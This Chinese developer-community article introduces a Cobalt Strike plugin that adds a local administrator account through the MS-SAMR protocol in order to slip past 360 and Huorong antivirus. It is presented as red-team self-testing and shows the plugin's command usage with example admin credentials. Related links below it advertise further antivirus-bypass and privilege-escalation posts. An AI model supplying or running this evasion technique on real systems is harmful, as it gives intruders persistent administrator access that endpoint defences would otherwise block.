AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

绕过360/某绒添加管理用户CS插件

2023-09-30 255
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 绕过360/某绒添加管理用户CS插件


hw攻防演练期间,工具安全性自测!


工具简介

这个插件是通过MS-SAMR协议将用户添加到理员,所以暂时可以用来绕过部分防护添加管理员用户。


工具使用

我们在cobaltstrike中使用shell、execute、run几个命令添加用户时都会被360等防护拦截,如下图所示。

加载adduserbysamr.cna,使用adduserbysamr命令通过samr将用户添加到localgroup,groupName默认为“Administrators”,请勿在AD中使用。

    beacon> help adduserbysamr
Use: adduserbysamr [username] [password] [groupName]
e.g: adduserbysamr sysadmin p@ssw0rd
     adduserbysamr sysadmin p@ssw0rd Administrators
     adduserbysamr sysadmin p@ssw0rd "Remote Desktop Users"


    绕过360成功添加管理员用户...,我们还可以修改下这个项目代码集成到自己的cobaltstrike插件中使用。

    文章标签:
    Shell
    潇湘信安
    目录
    相关文章
    Hacker2001
    |
    安全 Linux Shell
    【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
    【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
    Hacker2001
    2990 0
    【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
    潇湘信安
    |
    开发框架 安全 .NET
    记一次绕过安全狗和360提权案例
    记一次绕过安全狗和360提权案例
    潇湘信安
    364 0
    潇湘信安
    |
    安全 网络安全
    技巧!通过360卫士白名单绕过查杀
    技巧!通过360卫士白名单绕过查杀
    潇湘信安
    1662 0
    bruce_xiaowei
    |
    算法 数据安全/隐私保护
    CTF — MP3文件隐写
    CTF — MP3文件隐写
    bruce_xiaowei
    459 0
    好奇的菜鸟
    |
    存储 运维 KVM
    QEMU的QCOW2磁盘镜像文件查看
    QEMU的QCOW2磁盘镜像文件查看
    好奇的菜鸟
    1937 0
    bruce_xiaowei
    |
    算法 数据安全/隐私保护
    CTF — MP3文件隐写
    CTF — MP3文件隐写
    bruce_xiaowei
    537 0
    Jay17
    |
    存储 SQL 缓存
    Ctfshow web入门 PHP特性篇 web89-web151 全(一)
    Ctfshow web入门 PHP特性篇 web89-web151 全(一)
    Jay17
    1036 0
    开心工作室V(kaic_kaic)
    |
    安全 Java 大数据
    基于大数据的旅游系统的设计与实现(论文+源码)_kaic
    基于大数据的旅游系统的设计与实现(论文+源码)_kaic
    开心工作室V(kaic_kaic)
    513 0
    潇湘信安
    |
    运维 关系型数据库 MySQL
    绕过360安全卫士提权实战案例
    绕过360安全卫士提权实战案例
    潇湘信安
    949 1
    Linux开发架构之路
    |
    存储 NoSQL Unix
    看懂GDB调试核心:剖析ptrace原理及其应用场景!(下)
    看懂GDB调试核心:剖析ptrace原理及其应用场景!
    Linux开发架构之路
    725 0